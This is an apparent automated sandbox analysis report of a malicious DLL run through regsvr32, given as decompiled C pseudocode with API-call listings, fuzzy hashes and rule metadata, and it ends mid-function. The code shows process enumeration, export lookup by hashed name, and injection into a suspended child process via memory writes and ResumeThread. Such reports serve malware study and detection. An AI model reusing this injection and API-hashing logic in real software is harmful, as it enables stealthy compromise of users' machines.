GetVolumeInformationW.KERNEL32(00000000,?,00000100,00000000,00000000,00000000,?,00000100), ref: 1000B821

Part of subcall function 10009640: _vsnwprintf.MSVCRT ref: 1000965D

lstrcatW.KERNEL32 ref: 1000B85A
CharUpperBuffW.USER32(?,00000000), ref: 1000B86C

Memory Dump Source

Source File: 0000000D.00000002.637039550.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 0000000D.00000002.637019650.0000000010000000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_10000000_regsvr32.jbxd

Yara matches

Similarity

API ID: BuffCharComputerInformationNameUpperVolume_vsnwprintflstrcatlstrcpynmemset
String ID:
API String ID: 3410906232-0
Opcode ID: e02f1f27a289323d5cde8029b6ecff98d3f99e1de03a06f737997213c2c83dbc
Instruction ID: 180e092026911c17520c8b5fa365ce7934641c9957428f094d539ad927535ab9
Opcode Fuzzy Hash: e02f1f27a289323d5cde8029b6ecff98d3f99e1de03a06f737997213c2c83dbc
Instruction Fuzzy Hash: 9C2171B6900218BFE714DBA4CC8AFAF77BCEB44250F108169F505D6185EA75AF448B60

Uniqueness

Uniqueness Score: -1.00%

Function 1000ABA3, Relevance: 7.6, APIs: 5, Instructions: 65
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E1000ABA3(intOrPtr __ecx, void* __edx) {
				void* _v304;
				void* _v308;
				signed int _t14;
				signed int _t15;
				void* _t22;
				intOrPtr _t28;
				void* _t31;
				intOrPtr _t33;
				void* _t40;
				void* _t42;

				_t33 = __ecx;
				_t31 = __edx; // executed
				_t14 = CreateToolhelp32Snapshot(2, 0);
				_t42 = _t14;
				_t15 = _t14 | 0xffffffff;
				if(_t42 != _t15) {
					memset( &_v304, 0, 0x128);
					_v304 = 0x128;
					if(Process32First(_t42,  &_v304) != 0) {
						while(1) {
							_t22 = E1000CCC0(_t33,  &_v308, _t31); // executed
							_t40 = _t22;
							if(_t40 == 0) {
								break;
							}
							_t33 =  *0x1001e684; // 0x189faa0
							if(Process32Next(_t42,  &_v308) != 0) {
								continue;
							}
							break;
						}
						CloseHandle(_t42);
						_t15 = 0 | _t40 == 0x00000000;
					} else {
						_t28 =  *0x1001e684; // 0x189faa0
						 *((intOrPtr*)(_t28 + 0x30))(_t42);
						_t15 = 0xfffffffe;
					}
				}
				return _t15;
			}

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000011,?,00000010), ref: 1000ABBD
memset.MSVCRT ref: 1000ABD6
Process32First.KERNEL32(00000000,?), ref: 1000ABED
Process32Next.KERNEL32(00000000,?), ref: 1000AC21
CloseHandle.KERNEL32(00000000), ref: 1000AC2E

Memory Dump Source

Source File: 0000000D.00000002.637039550.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 0000000D.00000002.637019650.0000000010000000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_10000000_regsvr32.jbxd

Yara matches

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32memset
String ID:
API String ID: 1267121359-0
Opcode ID: 54e2d860bd13bc7846415f36553112f28911b30db34f205904eaa96e1d06a1b9
Instruction ID: 824b075522648d78722121d86b555edf1df252a9305654497386a44dc5d3d608
Opcode Fuzzy Hash: 54e2d860bd13bc7846415f36553112f28911b30db34f205904eaa96e1d06a1b9
Instruction Fuzzy Hash: B11191732043556BF710DB68DC89E9F37ECEB863A0F560A29F624CB181EB30D9058762

Uniqueness

Uniqueness Score: -1.00%

Function 1000DFAD, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E1000DFAD(void* __ecx, intOrPtr __edx) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v92;
				intOrPtr _t41;
				signed int _t47;
				signed int _t49;
				signed int _t51;
				void* _t56;
				struct HINSTANCE__* _t58;
				_Unknown_base(*)()* _t59;
				intOrPtr _t60;
				void* _t62;
				intOrPtr _t63;
				void* _t69;
				char _t70;
				void* _t75;
				CHAR* _t80;
				void* _t82;

				_t75 = __ecx;
				_v12 = __edx;
				_t60 =  *((intOrPtr*)(__ecx + 0x3c));
				_t41 =  *((intOrPtr*)(_t60 + __ecx + 0x78));
				if(_t41 == 0) {
					L4:
					return 0;
				}
				_t62 = _t41 + __ecx;
				_v24 =  *((intOrPtr*)(_t62 + 0x24)) + __ecx;
				_t73 =  *((intOrPtr*)(_t62 + 0x20)) + __ecx;
				_t63 =  *((intOrPtr*)(_t62 + 0x18));
				_v28 =  *((intOrPtr*)(_t62 + 0x1c)) + __ecx;
				_t47 = 0;
				_v20 =  *((intOrPtr*)(_t62 + 0x20)) + __ecx;
				_v8 = 0;
				_v16 = _t63;
				if(_t63 == 0) {
					goto L4;
				} else {
					goto L2;
				}
				while(1) {
					L2:
					_t49 = E1000D400( *((intOrPtr*)(_t73 + _t47 * 4)) + _t75, E1000C379( *((intOrPtr*)(_t73 + _t47 * 4)) + _t75), 0);
					_t51 = _v8;
					if((_t49 ^ 0x218fe95b) == _v12) {
						break;
					}
					_t73 = _v20;
					_t47 = _t51 + 1;
					_v8 = _t47;
					if(_t47 < _v16) {
						continue;
					}
					goto L4;
				}
				_t69 =  *((intOrPtr*)(_t60 + _t75 + 0x78)) + _t75;
				_t80 =  *((intOrPtr*)(_v28 + ( *(_v24 + _t51 * 2) & 0x0000ffff) * 4)) + _t75;
				if(_t80 < _t69 || _t80 >=  *((intOrPtr*)(_t60 + _t75 + 0x7c)) + _t69) {
					return _t80;
				} else {
					_t56 = 0;
					while(1) {
						_t70 = _t80[_t56];
						if(_t70 == 0x2e || _t70 == 0) {
							break;
						}
						 *((char*)(_t82 + _t56 - 0x58)) = _t70;
						_t56 = _t56 + 1;
						if(_t56 < 0x40) {
							continue;
						}
						break;
					}
					 *((intOrPtr*)(_t82 + _t56 - 0x58)) = 0x6c6c642e;
					 *((char*)(_t82 + _t56 - 0x54)) = 0;
					if( *((char*)(_t56 + _t80)) != 0) {
						_t80 =  &(( &(_t80[1]))[_t56]);
					}
					_t40 =  &_v92; // 0x6c6c642e
					_t58 = LoadLibraryA(_t40); // executed
					if(_t58 == 0) {
						goto L4;
					}
					_t59 = GetProcAddress(_t58, _t80);
					if(_t59 == 0) {
						goto L4;
					}
					return _t59;
				}
			}

APIs

LoadLibraryA.KERNEL32(.dll), ref: 1000E07D
GetProcAddress.KERNEL32(00000000,8DF08B59), ref: 1000E089

Strings

.dll, xrefs: 1000E079, 1000E07C

Memory Dump Source

Source File: 0000000D.00000002.637039550.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 0000000D.00000002.637019650.0000000010000000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_10000000_regsvr32.jbxd

Yara matches

Similarity

API ID: AddressLibraryLoadProc
String ID: .dll
API String ID: 2574300362-2738580789
Opcode ID: b7447c8816937ad7f9345e32d2240df4bb2b7db976f4be3fc21d842f10db7ef4
Instruction ID: 6da95daea6e89431fe10e6910c52a9851ea62cfcad36df982cd2ab94b172e300
Opcode Fuzzy Hash: b7447c8816937ad7f9345e32d2240df4bb2b7db976f4be3fc21d842f10db7ef4
Instruction Fuzzy Hash: F631E431A002998BEB54CFA9C8847AEBBF5EF44384F24446DD905E7349D770ED81C7A0

Uniqueness

Uniqueness Score: -1.00%

Function 1000CA25, Relevance: 4.6, APIs: 3, Instructions: 120
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 89%

			E1000CA25(intOrPtr __edx) {
				signed int _v8;
				intOrPtr _v12;
				signed int _v16;
				intOrPtr _v20;
				char _v24;
				void* _v36;
				char _v40;
				char _v80;
				char _t37;
				intOrPtr _t38;
				void* _t45;
				intOrPtr _t47;
				intOrPtr _t48;
				intOrPtr _t50;
				intOrPtr _t52;
				void* _t54;
				intOrPtr _t57;
				long _t61;
				intOrPtr _t62;
				signed int _t65;
				signed int _t68;
				signed int _t82;
				void* _t85;
				char _t86;

				_v8 = _v8 & 0x00000000;
				_v20 = __edx;
				_t65 = 0;
				_t37 = E1000C8FD( &_v8);
				_t86 = _t37;
				_v24 = _t86;
				_t87 = _t86;
				if(_t86 == 0) {
					return _t37;
				}
				_t38 =  *0x1001e688; // 0x1820590
				E1000A86D( &_v80,  *((intOrPtr*)(_t38 + 0xac)) + 7, _t87);
				_t82 = _v8;
				_t68 = 0;
				_v16 = 0;
				if(_t82 == 0) {
					L20:
					E1000861A( &_v24, 0);
					return _t65;
				}
				while(_t65 == 0) {
					while(_t65 == 0) {
						asm("stosd");
						asm("stosd");
						asm("stosd");
						asm("stosd");
						_t45 = E1000AE66( *((intOrPtr*)(_t86 + _t68 * 4)),  &_v40); // executed
						_t92 = _t45;
						if(_t45 >= 0) {
							_t54 = E1000CB77(E10005CEC,  &_v40, _t92, _v20); // executed
							if(_t54 != 0) {
								_t57 =  *0x1001e684; // 0x189faa0
								_t85 =  *((intOrPtr*)(_t57 + 0xc4))(0, 0, 0,  &_v80);
								if(_t85 != 0) {
									GetLastError();
									_t61 = ResumeThread(_v36);
									_t62 =  *0x1001e684; // 0x189faa0
									if(_t61 != 0) {
										_push(0xea60);
										_push(_t85);
										if( *((intOrPtr*)(_t62 + 0x2c))() == 0) {
											_t65 = _t65 + 1;
										}
										_t62 =  *0x1001e684; // 0x189faa0
									}
									CloseHandle(_t85);
								}
							}
						}
						if(_v40 != 0) {
							if(_t65 == 0) {
								_t52 =  *0x1001e684; // 0x189faa0
								 *((intOrPtr*)(_t52 + 0x104))(_v40, _t65);
							}
							_t48 =  *0x1001e684; // 0x189faa0
							 *((intOrPtr*)(_t48 + 0x30))(_v36);
							_t50 =  *0x1001e684; // 0x189faa0
							 *((intOrPtr*)(_t50 + 0x30))(_v40);
						}
						_t68 = _v16;
						_t47 = _v12 + 1;
						_v12 = _t47;
						if(_t47 < 2) {
							continue;
						} else {
							break;
						}
					}
					_t82 = _v8;
					_t68 = _t68 + 1;
					_v16 = _t68;
					if(_t68 < _t82) {
						continue;
					} else {
						break;
					}
					do {
						goto L19;
					} while (_t82 != 0);
					goto L20;
				}
				L19:
				E1000861A(_t86, 0xfffffffe);
				_t86 = _t86 + 4;
				_t82 = _t82 - 1;
			}

APIs

Part of subcall function 1000AE66: memset.MSVCRT ref: 1000AE85
Part of subcall function 1000AE66: CreateProcessW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,?,?,?,00000000,00000000), ref: 1000AEA5

Part of subcall function 1000CB77: memset.MSVCRT ref: 1000CBB8
Part of subcall function 1000CB77: NtProtectVirtualMemory.NTDLL(?,?,?,00000004,00000000), ref: 1000CC22
Part of subcall function 1000CB77: NtWriteVirtualMemory.NTDLL(?,?,000000E9,00000005,?), ref: 1000CC3F
Part of subcall function 1000CB77: NtProtectVirtualMemory.NTDLL(?,?,?,00000000,00000000), ref: 1000CC60
Part of subcall function 1000CB77: FreeLibrary.KERNEL32(00000000,?,00000000,00000000), ref: 1000CC73

GetLastError.KERNEL32(?,00000001), ref: 1000CACC
ResumeThread.KERNEL32(?,?,00000001), ref: 1000CADA
CloseHandle.KERNEL32(00000000,?,00000001), ref: 1000CAFD

Memory Dump Source

Source File: 0000000D.00000002.637039550.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 0000000D.00000002.637019650.0000000010000000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_10000000_regsvr32.jbxd

Yara matches

Similarity

API ID: MemoryVirtual$Protectmemset$CloseCreateErrorFreeHandleLastLibraryProcessResumeThreadWrite
String ID:
API String ID: 1274669455-0
Opcode ID: fa01402cc64924efbc228351cece4e0558249ade2dca9af57fb62686f16e4da8
Instruction ID: 8d942f140de3fd5d428a133cfbe882c53197cdce90259c44b1bbe97365db357f
Opcode Fuzzy Hash: fa01402cc64924efbc228351cece4e0558249ade2dca9af57fb62686f16e4da8
Instruction Fuzzy Hash: AF417E31A00319AFEB01DFA8C985EAE77F9FF58390F124168F501E7265DB30AE058B51

Uniqueness

Uniqueness Score: -1.00%

Function 1000B998, Relevance: 4.6, APIs: 3, Instructions: 54
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 86%

			E1000B998(union _TOKEN_INFORMATION_CLASS __edx, DWORD* _a4) {
				long _v8;
				void* _v12;
				void* _t12;
				void* _t20;
				void* _t22;
				union _TOKEN_INFORMATION_CLASS _t28;
				void* _t31;

				_push(_t22);
				_push(_t22);
				_t31 = 0;
				_t28 = __edx;
				_t20 = _t22;
				if(GetTokenInformation(_t20, __edx, 0, 0,  &_v8) != 0 || GetLastError() != 0x7a) {
					L6:
					_t12 = _t31;
				} else {
					_t31 = E10008604(_v8);
					_v12 = _t31;
					if(_t31 != 0) {
						if(GetTokenInformation(_t20, _t28, _t31, _v8, _a4) != 0) {
							goto L6;
						} else {
							E1000861A( &_v12, _t16);
							goto L3;
						}
					} else {
						L3:
						_t12 = 0;
					}
				}
				return _t12;
			}

APIs

GetTokenInformation.KERNELBASE(00000000,00000001,00000000,00000000,00000000,74EC17D9,00000000,10000000,00000000,00000000,?,1000BA37,?,00000000,?,1000D0A8), ref: 1000B9B3
GetLastError.KERNEL32(?,1000BA37,?,00000000,?,1000D0A8), ref: 1000B9BA

Part of subcall function 10008604: HeapAlloc.KERNEL32(00000008,?,?,10008F84,00000100,?,10005FCB), ref: 10008612

GetTokenInformation.KERNELBASE(00000000,00000001,00000000,00000000,00000000,?,1000BA37,?,00000000,?,1000D0A8), ref: 1000B9E9

Memory Dump Source

Source File: 0000000D.00000002.637039550.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 0000000D.00000002.637019650.0000000010000000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_10000000_regsvr32.jbxd

Yara matches

Similarity

API ID: InformationToken$AllocErrorHeapLast
String ID:
API String ID: 4258577378-0
Opcode ID: 25ca12ee674f2655c61ae174559f6c02d40ec3235ed2cc3a33db728961b5c84c
Instruction ID: 0e837ad5d344672522dd0af1a739acbaf95446ba78b21159f473d30cfb6f5d1d
Opcode Fuzzy Hash: 25ca12ee674f2655c61ae174559f6c02d40ec3235ed2cc3a33db728961b5c84c
Instruction Fuzzy Hash: 8E01A27260066ABFAB24DFA6CC89D8F7FECEB456E17120225F605D3124E630DE00C7A0

Uniqueness

Uniqueness Score: -1.00%

Function 1000AE66, Relevance: 3.0, APIs: 2, Instructions: 46
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 47%

			E1000AE66(WCHAR* __ecx, struct _PROCESS_INFORMATION* __edx) {
				struct _STARTUPINFOW _v72;
				signed int _t11;
				WCHAR* _t15;
				int _t19;
				struct _PROCESS_INFORMATION* _t20;

				_t20 = __edx;
				_t15 = __ecx;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_t19 = 0x44;
				memset( &_v72, 0, _t19);
				_v72.cb = _t19;
				_t11 = CreateProcessW(0, _t15, 0, 0, 0, 4, 0, 0,  &_v72, _t20);
				asm("sbb eax, eax");
				return  ~( ~_t11) - 1;
			}

0x1000ae6f
0x1000ae75
0x1000ae79
0x1000ae7a
0x1000ae7b
0x1000ae7c
0x1000ae80
0x1000ae85
0x1000ae8d
0x1000aea5
0x1000aeab
0x1000aeb3

APIs

memset.MSVCRT ref: 1000AE85
CreateProcessW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,?,?,?,00000000,00000000), ref: 1000AEA5

Memory Dump Source

Source File: 0000000D.00000002.637039550.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 0000000D.00000002.637019650.0000000010000000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_10000000_regsvr32.jbxd

Yara matches

Similarity

API ID: CreateProcessmemset
String ID:
API String ID: 2296119082-0
Opcode ID: 9215398e04c0e1465519a4e0e52a5396276f524f1bd12603e09a1ebda4c409e5
Instruction ID: 8cd7357356a5339f89587e4f6554bd087a86913dd4092c53185382899a550088
Opcode Fuzzy Hash: 9215398e04c0e1465519a4e0e52a5396276f524f1bd12603e09a1ebda4c409e5
Instruction Fuzzy Hash: 63F012F26041187FF760D6ADDC46EBB77ACC789654F104532FA05D6190E560ED058161

Uniqueness

Uniqueness Score: -1.00%

Function 1000E1BC, Relevance: 3.0, APIs: 2, Instructions: 35
libraryCOMMON

Download Yara Rule

C-Code - Quality: 47%

			E1000E1BC(void* __ecx, void* __edx, intOrPtr _a4) {
				char _v8;
				char _t5;
				struct HINSTANCE__* _t7;
				void* _t10;
				void* _t12;
				void* _t22;
				void* _t25;

				_push(__ecx);
				_t12 = __ecx;
				_t22 = __edx;
				_t5 = E100095C7(_a4);
				_t25 = 0;
				_v8 = _t5;
				_push(_t5);
				if(_a4 != 0x7c3) {
					_t7 = LoadLibraryA(); // executed
				} else {
					_t7 = GetModuleHandleA();
				}
				if(_t7 != 0) {
					_t10 = E1000E171(_t12, _t22, _t7); // executed
					_t25 = _t10;
				}
				E100085C2( &_v8);
				return _t25;
			}

0x1000e1bf
0x1000e1c2
0x1000e1c8
0x1000e1ca
0x1000e1cf
0x1000e1d1
0x1000e1db
0x1000e1dc
0x1000e1eb
0x1000e1de
0x1000e1de
0x1000e1de
0x1000e1ef
0x1000e1f6
0x1000e1fc
0x1000e1fc
0x1000e201
0x1000e20c

APIs

GetModuleHandleA.KERNEL32(00000000,00000000,00000001,?,1001BA28), ref: 1000E1DE
LoadLibraryA.KERNEL32(00000000,00000000,00000001,?,1001BA28), ref: 1000E1EB

Memory Dump Source

Source File: 0000000D.00000002.637039550.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 0000000D.00000002.637019650.0000000010000000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_10000000_regsvr32.jbxd

Yara matches

Similarity

API ID: HandleLibraryLoadModule
String ID:
API String ID: 4133054770-0
Opcode ID: 475ae924f075fca7c4d943cada4b77f08c9b111225325e3c1749fe1895f8c309
Instruction ID: 73ed2ebf8e11191eb6597406948a09e9f6d4d80ef2ff5e7d934a0b04cc0c2bea
Opcode Fuzzy Hash: 475ae924f075fca7c4d943cada4b77f08c9b111225325e3c1749fe1895f8c309
Instruction Fuzzy Hash: 92F08231704254ABE704DB69DC8589EB7EDEB547D1710402AF406E3255DA70DE0087A0

Uniqueness

Uniqueness Score: -1.00%

Function 1000CCC0, Relevance: 2.5, APIs: 2, Instructions: 48
sleepstringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E1000CCC0(void* __ecx, intOrPtr _a4, signed int _a8) {
				CHAR* _v8;
				int _t28;
				signed int _t31;
				signed int _t34;
				signed int _t35;
				void* _t38;
				signed int* _t41;

				_t41 = _a8;
				_t31 = 0;
				if(_t41[1] > 0) {
					_t38 = 0;
					do {
						_t3 =  &(_t41[2]); // 0xe6840d8b
						_t34 =  *_t3;
						_t35 = 0;
						_a8 = 0;
						if( *((intOrPtr*)(_t38 + _t34 + 8)) > 0) {
							_v8 = _a4 + 0x24;
							while(1) {
								_t28 = lstrcmpiA(_v8,  *( *((intOrPtr*)(_t38 + _t34 + 0xc)) + _t35 * 4));
								_t14 =  &(_t41[2]); // 0xe6840d8b
								_t34 =  *_t14;
								if(_t28 == 0) {
									break;
								}
								_t35 = _a8 + 1;
								_a8 = _t35;
								if(_t35 <  *((intOrPtr*)(_t34 + _t38 + 8))) {
									continue;
								} else {
								}
								goto L8;
							}
							 *_t41 =  *_t41 |  *(_t34 + _t38);
						}
						L8:
						_t31 = _t31 + 1;
						_t38 = _t38 + 0x10;
						_t20 =  &(_t41[1]); // 0x1374ff85
					} while (_t31 <  *_t20);
				}
				Sleep(0xa);
				return 1;
			}

APIs

lstrcmpiA.KERNEL32(?,?,00000128,00000000,?,?,?,1000AC0D,?,?), ref: 1000CCF4
Sleep.KERNEL32(0000000A,00000000,?,?,?,1000AC0D,?,?), ref: 1000CD26

Memory Dump Source

Source File: 0000000D.00000002.637039550.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 0000000D.00000002.637019650.0000000010000000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_10000000_regsvr32.jbxd

Yara matches

Similarity

API ID: Sleeplstrcmpi
String ID:
API String ID: 1261054337-0
Opcode ID: d589c2e27be55aab14665e750e2f3d45a62fba7c08b0dfb6dc3d34da2db7017b
Instruction ID: cde0d477192250e791ba25b7cb0ca9c4b7eae4faf087914376a22588bee842ac
Opcode Fuzzy Hash: d589c2e27be55aab14665e750e2f3d45a62fba7c08b0dfb6dc3d34da2db7017b
Instruction Fuzzy Hash: 21018031600709EFEB10DF69C884D5AB7E5FF843A4725C47AE95A8B215D730E942DB50

Uniqueness

Uniqueness Score: -1.00%

Function 10005E96, Relevance: 1.5, APIs: 1, Instructions: 9
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E10005E96() {
				intOrPtr _t3;

				_t3 =  *0x1001e684; // 0x189faa0
				 *((intOrPtr*)(_t3 + 0x2c))( *0x1001e6a8, 0xffffffff);
				ExitProcess(0);
			}

0x10005e96
0x10005ea3
0x10005ead

APIs

ExitProcess.KERNEL32(00000000), ref: 10005EAD

Memory Dump Source

Source File: 0000000D.00000002.637039550.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 0000000D.00000002.637019650.0000000010000000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_10000000_regsvr32.jbxd

Yara matches

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: 5cd9b7efdf0ac82a49e6ca76f2220a9fceff99eff54594cf8359571d6987a725
Instruction ID: 9fe5a48d1d7df1d44c8ff89900a8b99800cce3c20b8b2062506d45ae6f81fc06
Opcode Fuzzy Hash: 5cd9b7efdf0ac82a49e6ca76f2220a9fceff99eff54594cf8359571d6987a725
Instruction Fuzzy Hash: D4C002712151A1AFEA409BA4CD88F0877A1AB68362F9282A5F5259A1F6CA30D8009B11

Uniqueness

Uniqueness Score: -1.00%

Function 100085EF, Relevance: 1.5, APIs: 1, Instructions: 6
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E100085EF() {
				void* _t1;

				_t1 = HeapCreate(0, 0x80000, 0); // executed
				 *0x1001e768 = _t1;
				return _t1;
			}

0x100085f8
0x100085fe
0x10008603

APIs

HeapCreate.KERNEL32(00000000,00080000,00000000,10005FA7), ref: 100085F8

Memory Dump Source

Source File: 0000000D.00000002.637039550.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 0000000D.00000002.637019650.0000000010000000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_10000000_regsvr32.jbxd

Yara matches

Similarity

API ID: CreateHeap
String ID:
API String ID: 10892065-0
Opcode ID: 21e30d703b760380db77e66f3654ad7d37bd304b680c7c4cfdef8daab914962f
Instruction ID: f703af9baad619bee9f37dfa55c6143b3da77678d96310d0b12c6411cce6613a
Opcode Fuzzy Hash: 21e30d703b760380db77e66f3654ad7d37bd304b680c7c4cfdef8daab914962f
Instruction Fuzzy Hash: B9B012B0A8471096F2901B204C86B047550A308B0AF308001F708581D0C6B05104CB14

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 1000DB3C, Relevance: 24.9, APIs: 12, Strings: 2, Instructions: 388
memoryCOMMON

Download Yara Rule

C-Code - Quality: 50%

			E1000DB3C(intOrPtr __ecx, intOrPtr __edx, void* __eflags, intOrPtr _a4) {
				signed int _v12;
				signed int _v16;
				signed int _v20;
				char _v24;
				void* _v28;
				signed int _v32;
				char _v36;
				intOrPtr _v40;
				signed int _v44;
				char _v48;
				char _v52;
				intOrPtr _v56;
				signed int _v60;
				char* _v72;
				signed short _v80;
				signed int _v84;
				char _v88;
				char _v92;
				char _v96;
				intOrPtr _v100;
				char _v104;
				char _v616;
				intOrPtr* _t159;
				char _t165;
				signed int _t166;
				signed int _t173;
				signed int _t178;
				signed int _t186;
				intOrPtr* _t187;
				signed int _t188;
				signed int _t192;
				intOrPtr* _t193;
				intOrPtr _t200;
				intOrPtr* _t205;
				signed int _t207;
				signed int _t209;
				intOrPtr* _t210;
				intOrPtr _t212;
				intOrPtr* _t213;
				signed int _t214;
				char _t217;
				signed int _t218;
				signed int _t219;
				signed int _t230;
				signed int _t235;
				signed int _t242;
				signed int _t243;
				signed int _t244;
				signed int _t245;
				intOrPtr* _t247;
				intOrPtr* _t251;
				signed int _t252;
				intOrPtr* _t253;
				void* _t255;
				intOrPtr* _t261;
				signed int _t262;
				signed int _t283;
				signed int _t289;
				char* _t298;
				void* _t320;
				signed int _t322;
				intOrPtr* _t323;
				intOrPtr _t324;
				signed int _t327;
				intOrPtr* _t328;
				intOrPtr* _t329;

				_v32 = _v32 & 0x00000000;
				_v60 = _v60 & 0x00000000;
				_v56 = __edx;
				_v100 = __ecx;
				_t159 = E1000D523(__ecx);
				_t251 = _t159;
				_v104 = _t251;
				if(_t251 == 0) {
					return _t159;
				}
				_t320 = E10008604(0x10);
				_v36 = _t320;
				_pop(_t255);
				if(_t320 == 0) {
					L53:
					E1000861A( &_v60, 0xfffffffe);
					E1000D5D7( &_v104);
					return _t320;
				}
				_t165 = E100095E1(_t255, 0x536);
				 *_t328 = 0x609;
				_v52 = _t165;
				_t166 = E100095E1(_t255);
				_push(0);
				_push(_v56);
				_v20 = _t166;
				_push(_t166);
				_push(_a4);
				_t322 = E100092E5(_t165);
				_v60 = _t322;
				E100085D5( &_v52);
				E100085D5( &_v20);
				_t329 = _t328 + 0x20;
				if(_t322 != 0) {
					_t323 = __imp__#2;
					_v40 =  *_t323(_t322);
					_t173 = E100095E1(_t255, 0x9e4);
					_v20 = _t173;
					_v52 =  *_t323(_t173);
					E100085D5( &_v20);
					_t324 = _v40;
					_t261 =  *_t251;
					_t252 = 0;
					_t178 =  *((intOrPtr*)( *_t261 + 0x50))(_t261, _v52, _t324, 0, 0,  &_v32);
					__eflags = _t178;
					if(_t178 != 0) {
						L52:
						__imp__#6(_t324);
						__imp__#6(_v52);
						goto L53;
					}
					_t262 = _v32;
					_v28 = 0;
					_v20 = 0;
					__eflags = _t262;
					if(_t262 == 0) {
						L49:
						 *((intOrPtr*)( *_t262 + 8))(_t262);
						__eflags = _t252;
						if(_t252 == 0) {
							E1000861A( &_v36, 0);
							_t320 = _v36;
						} else {
							 *(_t320 + 8) = _t252;
							 *_t320 = E100091E3(_v100);
							 *((intOrPtr*)(_t320 + 4)) = E100091E3(_v56);
						}
						goto L52;
					} else {
						goto L6;
					}
					while(1) {
						L6:
						_t186 =  *((intOrPtr*)( *_t262 + 0x10))(_t262, 0xea60, 1,  &_v28,  &_v84);
						__eflags = _t186;
						if(_t186 != 0) {
							break;
						}
						_v16 = 0;
						_v48 = 0;
						_v12 = 0;
						_v24 = 0;
						__eflags = _v84;
						if(_v84 == 0) {
							break;
						}
						_t187 = _v28;
						_t188 =  *((intOrPtr*)( *_t187 + 0x1c))(_t187, 0, 0x40, 0,  &_v24);
						__eflags = _t188;
						if(_t188 >= 0) {
							__imp__#20(_v24, 1,  &_v16);
							__imp__#19(_v24, 1,  &_v48);
							_t46 = _t320 + 0xc; // 0xc
							_t253 = _t46;
							_t327 = _t252 << 3;
							_t47 = _t327 + 8; // 0x8
							_t192 = E10008698(_t327, _t47);
							__eflags = _t192;
							if(_t192 == 0) {
								__imp__#16(_v24);
								_t193 = _v28;
								 *((intOrPtr*)( *_t193 + 8))(_t193);
								L46:
								_t252 = _v20;
								break;
							}
							 *(_t327 +  *_t253) = _v48 - _v16 + 1;
							 *((intOrPtr*)(_t327 +  *_t253 + 4)) = E10008604( *(_t327 +  *_t253) << 3);
							_t200 =  *_t253;
							__eflags =  *(_t327 + _t200 + 4);
							if( *(_t327 + _t200 + 4) == 0) {
								_t136 = _t320 + 0xc; // 0xc
								E1000861A(_t136, 0);
								E1000861A( &_v36, 0);
								__imp__#16(_v24);
								_t205 = _v28;
								 *((intOrPtr*)( *_t205 + 8))(_t205);
								_t320 = _v36;
								goto L46;
							}
							_t207 = _v16;
							while(1) {
								_v12 = _t207;
								__eflags = _t207 - _v48;
								if(_t207 > _v48) {
									break;
								}
								_v44 = _v44 & 0x00000000;
								_t209 =  &_v12;
								__imp__#25(_v24, _t209,  &_v44);
								__eflags = _t209;
								if(_t209 < 0) {
									break;
								}
								_t212 = E100091E3(_v44);
								 *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + (_v12 - _v16) * 8)) = _t212;
								_t213 = _v28;
								_t281 =  *_t213;
								_t214 =  *((intOrPtr*)( *_t213 + 0x10))(_t213, _v44, 0,  &_v80, 0, 0);
								__eflags = _t214;
								if(_t214 < 0) {
									L39:
									__imp__#6(_v44);
									_t207 = _v12 + 1;
									__eflags = _t207;
									continue;
								}
								_v92 = E100095E1(_t281, 0x250);
								 *_t329 = 0x4cc;
								_t217 = E100095E1(_t281);
								_t283 = _v80;
								_v96 = _t217;
								_t218 = _t283 & 0x0000ffff;
								__eflags = _t218 - 0xb;
								if(__eflags > 0) {
									_t219 = _t218 - 0x10;
									__eflags = _t219;
